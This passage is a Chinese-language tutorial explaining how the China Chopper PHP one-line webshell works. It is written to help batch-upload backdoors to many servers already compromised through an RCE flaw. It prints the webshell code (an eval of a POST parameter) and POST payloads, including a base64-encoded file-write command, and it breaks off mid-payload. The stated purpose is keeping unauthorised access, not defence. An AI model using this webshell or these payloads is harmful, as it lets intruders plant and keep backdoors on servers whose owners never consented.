php一句话木马连菜刀,如何基于菜刀PHP一句话实现单个文件批量上传？

本文原创作者：安全小飞侠

0x00 前言

很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后，可能想要批量传个后门以备后用。这时，我们不禁会面临一个问题，使用菜刀一个个上传显得太慢，那么如何快速的实现文件的批量上传呢？本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。

0x01 原理分析

首先，我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。

下面是最常见的php一句话木马：<?php  eval($_POST[1]); ?>

当我们将一句话木马上传到web服务器上后，我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。

那么，此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢？通过分析菜刀的原理，我们不难发现菜刀是利用了eval这个函数来执行通过POST方法传过来的命令语句。

因此，如果我们想通过菜刀一句话木马来实现文件上传的话，只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST请求即可，比如：

POST:1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];

上面代码包含2个部分：

1. 一句话的密码

2. 发送给服务器端的php执行代码

既然知道原理了，我们只需要发送如下的POST请求即可完成利用一句话上传文件的功能：

POST:1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQo